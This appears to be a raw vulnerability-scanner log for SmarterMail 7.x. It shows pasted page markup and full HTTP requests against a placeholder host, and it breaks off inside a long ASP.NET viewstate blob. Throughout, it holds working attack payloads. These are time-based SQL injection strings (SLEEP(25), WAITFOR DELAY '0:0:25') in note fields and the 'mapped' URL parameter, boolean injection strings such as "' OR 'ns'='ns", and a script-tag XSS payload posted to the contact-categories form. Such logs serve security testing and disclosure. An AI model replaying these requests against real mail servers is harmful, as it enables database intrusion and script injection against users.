window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MDE3ZDZhYWIwZGI1NGFlYmE4OGY3YjgyMjgyODczZTM-" name="ctl00_MPH_HyperGrid1_CB64_MDE3ZDZhYWIwZGI1NGFlYmE4OGY3YjgyMjgyODczZTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NjFhZjJhZjJhNjJjNDM1YmJiMDk5NzcxMjg4NjlhZGQ-" name="ctl00_MPH_HyperGrid1_CB64_NjFhZjJhZjJhNjJjNDM1YmJiMDk5NzcxMjg4NjlhZGQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-111') OR SLEEP(25)=0 LIMIT 1-- </td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzdmYWI2MGE0YjJiNGUwZTg1NTNiMWI3MjRjZDRhZDk-" name="ctl00_MPH_HyperGrid1_CB64_NzdmYWI2MGE0YjJiNGUwZTg1NTNiMWI3MjRjZDRhZDk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MGY0ZGEwOTNjODRiNDQyNzg2NDFhMzE5YzdkY2YxNjQ-" name="ctl00_MPH_HyperGrid1_CB64_MGY0ZGEwOTNjODRiNDQyNzg2NDFhMzE5YzdkY2YxNjQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3YjU5OTQxYmU2NDYwZDkxZmNiMTVjYzU3OWEyOTc-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3YjU5OTQxYmU2NDYwZDkxZmNiMTVjYzU3OWEyOTc-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">' OR 'ns'='ns</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_OGIwYzBmMGMxZGQ0NGQxYzkzYjkyMGZiMjQyYTk1MDA-" name="ctl00_MPH_HyperGrid1_CB64_OGIwYzBmMGMxZGQ0NGQxYzkzYjkyMGZiMjQyYTk1MDA-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-1 OR 17-7=10</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWI2OWUzNDBlNjE3NDk0Mzg3ZGFhYmIzNDNjNzRjYWY-" name="ctl00_MPH_HyperGrid1_CB64_MWI2OWUzNDBlNjE3NDk0Mzg3ZGFhYmIzNDNjNzRjYWY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1 OR X='ss</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjJlZWMzZGY1Y2RhNGM0OGE0NWVmYjE3ZDU4NmQxODM-" name="ctl00_MPH_HyperGrid1_CB64_MjJlZWMzZGY1Y2RhNGM0OGE0NWVmYjE3ZDU4NmQxODM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px ..
- /Main/frmTask.aspx

/Main/frmTask.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmTask.aspx?mapped=%27);WAITFOR%20DELAY%20%270:0:25%27--&user=dummy&popup..

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

POST /Main/frmTask.aspx?mapped=%27);WAITFOR%20DELAY%20%270:0:25%27--&user=dummy&popup=true HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmTask.aspx?mapped=false&user=dummy&popup=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 17856
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__LASTFOCUS=3&__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUJMTA0NjI1MzI3DxYGHghfX19UaXRsZQUITXkgVGFza3MeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgwCAg9kFgICAQ8WAh4HVmlzaWJsZWhkAgMPZBYEAgEPZBYCAgUPDxYCHwNoZGQCAw9kFgICAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFD3dpbmRvdy5jbG9zZSgpO2RkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIDD2QWBgICD2QWAgIBD2QWDgIBDw8WAh8DaGQWBGYPDxYGHghDc3NDbGFzcwUMSW5kZW50IEZpeGVkHwcFDFJlbGF0ZWQgSXRlbR4EXyFTQgICZGQCAQ8PFgQfCAUIIFNldHRpbmcfCQICZGQCAg9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgRmDw8WEB4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeB01heERhdGUGAADbmXo%2fMQkfCQICHgxTZWxlY3RlZERhdGUGwPeK80owzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQFcgUwVRCGQWCmYPFCsACA8WGB8KaB4NT3JpZ2luYWxWYWx1ZQUUMTAvMi8yMDEwIDE6MTU6MDAgUE0fC2gfDAUMU21hcnRlclRvb2xzHgxBdXRvUG9zdEJhY2tnHgpEYXRlRm9ybWF0BQFnHhFEaXNwbGF5RGF0ZUZvcm1hdAUBZx8HBRMyMDEwLTEwLTAyLTEzLTE1LTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfDQYAANuZej8xCR8PBgBAVyBTBVEIZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpSG92ZXIfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEXJpVGV4dEJveCByaUVycm9yHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlGb2N1c2VkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlFbmFibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRW1wdHkfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEHJpVGV4dEJveCByaVJlYWQfCQKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawVLcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwnY2FsJyk7ZAICDxQrAA0PFhoFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBRFFbmFibGVNdWx0aVNlbGVjdGgFD1JlbmRlckludmlzaWJsZWcFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUETWluRAYAQFcgUwVRCAUDRVJTaAUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1heEQGAADbmXo%2fMQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxVoZGQWBB8IBQtyY01haW5UYWJsZR8JAgIWBB8IBQxyY090aGVyTW9udGgfCQICZBYEHwgFCnJjU2VsZWN0ZWQfCQICZBYEHwgFCnJjRGlzYWJsZWQfCQICFgQfCAUMcmNPdXRPZlJhbmdlHwkCAhYEHwgFCXJjV2Vla2VuZB8JAgIWBB8IBQdyY0hvdmVyHwkCAhYEHwgFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8JAgIWBB8IBQlyY1ZpZXdTZWwfCQICZAIDDw8WBB8XBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYfGAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmFgIfGQVMcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwndGltZScpO2QCBA8UKwACDxYOHglTdGFydFRpbWUoKVxTeXN0ZW0uVGltZVNwYW4sIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQgwNzowMDowMB4HRW5kVGltZSgrBAgxOTowMDowMB4ISW50ZXJ2YWwoKwQIMDA6MTU6MDAfCmgfC2gfDAUMU21hcnRlclRvb2xzHxVoZBYEHwgFB3JjSG92ZXIfCQICFgJmDxQrAAkPFgYeDVJlcGVhdENvbHVtbnMCBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCMGQWBB8IZR8JAgJkFgQfCGUfCQICZGQWBB8IBQhyY0hlYWRlch8JAgIWBB8IBQhyY0Zvb3Rlch8JAgIWBh8WGwAAAAAAQG9AAQAAAB8IBTRSYWRDYWxlbmRhclRpbWVWaWV3IFJhZENhbGVuZGFyVGltZVZpZXdfU21hcnRlclRvb2xzHwkCggIWYAIBD2QWAmYPFgIeCWlubmVyaHRtbAUHNzowMCBBTWQCAg9kFgJmDxYCHyAFBzc6MTUgQU1kAgMPZBYCZg8WAh8gBQc3OjMwIEFNZAIED2QWAmYPFgIfIAUHNzo0NSBBTWQCBQ9kFgJmDxYCHyAFBzg6MDAgQU1kAgYPZBYCZg8WAh8gBQc4OjE1IEFNZAIHD2QWAmYPFgIfIAUHODozMCBBTWQCCA9kFgJmDxYCHyAFBzg6NDUgQU1kAgkPZBYCZg8WAh8gBQc5OjAwIEFNZAIKD2QWAmYPFgIfIAUHOToxNSBBTWQCCw9kFgJmDxYCHyAFBzk6MzAgQU1kAgwPZBYCZg8WAh8gBQc5OjQ1IEFNZAIND2QWAmYPFgIfIAUIMTA6MDAgQU1kAg4PZBYCZg8WAh8gBQgxMDoxNSBBTWQCDw9kFgJmDxYCHyAFCDEwOjMwIEFNZAIQD2QWAmYPFgIfIAUIMTA6NDUgQU1kAhEPZBYCZg8WAh8gBQgxMTowMCBBTWQCEg9kFgJmDxYCHyAFCDExOjE1IEFNZAITD2QWAmYPFgIfIAUIMTE6MzAgQU1kAhQPZBYCZg8WAh8gBQgxMTo0NSBBTWQCFQ9kFgJmDxYCHyAFCDEyOjAwIFBNZAIWD2QWAmYPFgIfIAUIMTI6MTUgUE1kAhcPZBYCZg8WAh8gBQgxMjozMCBQTWQCGA9kFgJmDxYCHyAFCDEyOjQ1IFBNZAIZD2QWAmYPFgIfIAUHMTowMCBQTWQCGg9kFgJmDxYCHyAFBzE6MTUgUE1kAhsPZBYCZg8WAh8gBQcxOjMwIFBNZAIcD2QWAmYPFgIfIAUHMTo0NSBQTWQCHQ9kFgJmDxYCHyAFBzI6MDAgUE1kAh4PZBYCZg8WAh8gBQcyOjE1IFBNZAIfD2QWAmYPFgIfIAUHMjozMCBQTWQCIA9kFgJmDxYCHyAFBzI6NDUgUE1kAiEPZBYCZg8WAh8gBQczOjAwIFBNZAIiD2QWAmYPFgIfIAUHMzoxNSBQTWQCIw9kFgJmDxYCHyAFBzM6MzAgUE1kAiQPZBYCZg8WAh8gBQczOjQ1IFBNZAIlD2QWAmYPFgIfIAUHNDowMCBQTWQCJg9kFgJmDxYCHyAFBzQ6MTUgUE1kAicPZBYCZg8WAh8gBQc0OjMwIFBNZAIoD2QWAmYPFgIfIAUHNDo0NSBQTWQCKQ9kFgJmDxYCHyAFBzU6MDAgUE1kAioPZBYCZg8WAh8gBQc1OjE1IFBNZAIrD2QWAmYPFgIfIAUHNTozMCBQTWQCLA9kFgJmDxYCHyAFBzU6NDUgUE1kAi0PZBYCZg8WAh8gBQc2OjAwIFBNZAIuD2QWAmYPFgIfIAUHNjoxNSBQTWQCLw9kFgJmDxYCHyAFBzY6MzAgUE1kAjAPZBYCZg8WAh8gBQc2OjQ1IFBNZAIBDw8WAh8HBRExMC8yLzIwMTAgMToxNSBQTWRkAgMPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYEZg8PFhAfCmgfC2gfDAUMU21hcnRlclRvb2xzHw0GAADbmXo%2fMQkfCQICHw4GwF9PVVMwzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR8PBgBAVyBTBVEIZBYKZg8UKwAIDxYYHwpoHxAFFDEwLzIvMjAxMCAyOjE1OjAwIFBNHwtoHwwFDFNtYXJ0ZXJUb29scx8RZx8SBQFnHxMFAWcfBwUTMjAxMC0xMC0wMi0xNC0xNS0wMB8UBQdyaUxhYmVsHxVoHw0GAADbmXo%2fMQkfDwYAQFcgUwVRCGQWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlIb3Zlch8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRXJyb3IfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUZvY3VzZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUVuYWJsZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFFHJpVGV4dEJveCByaURpc2FibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlFbXB0eR8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAUQcmlUZXh0Qm94IHJpUmVhZB8JAoICZAIBDw8WBB8XBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8YBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxkFSXJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCdjYWwnKTtkAgIPFCsADQ8WGgUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFEUVuYWJsZU11bHRpU2VsZWN0aAUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAVyBTBVEIBQNFUlNoBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAANuZej8xCQ8WCB8MBQxTbWFydGVyVG9vbHMfC2gfCmgfFWhkZBYEHwgFC3JjTWFpblRhYmxlHwkCAhYEHwgFDHJjT3RoZXJNb250aB8JAgJkFgQfCAUKcmNTZWxlY3RlZB8JAgJkFgQfCAUKcmNEaXNhYmxlZB8JAgIWBB8IBQxyY091dE9mUmFuZ2UfCQICFgQfCAUJcmNXZWVrZW5kHwkCAhYEHwgFB3JjSG92ZXIfCQICFgQfCAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHwkCAhYEHwgFCXJjVmlld1NlbB8JAgJkAgMPDxYEHxcFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZh8YBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh8ZBUpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX0VuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwndGltZScpO2QCBA8UKwACDxYOHxooKwQIMDc6MDA6MDAfGygrBAgxOTowMDowMB8cKCsECDAwOjE1OjAwHwpoHwtoHwwFDFNtYXJ0ZXJUb29scx8VaGQWBB8IBQdyY0hvdmVyHwkCAhYCZg8UKwAJDxYGHx0CBB8eFgAfHwIwZBYEHwhlHwkCAmQWBB8IZR8JAgJkZBYEHwgFCHJjSGVhZGVyHwkCAhYEHwgFCHJjRm9vdGVyHwkCAhYGHxYbAAAAAABAb0ABAAAAHwgFNFJhZENhbGVuZGFyVG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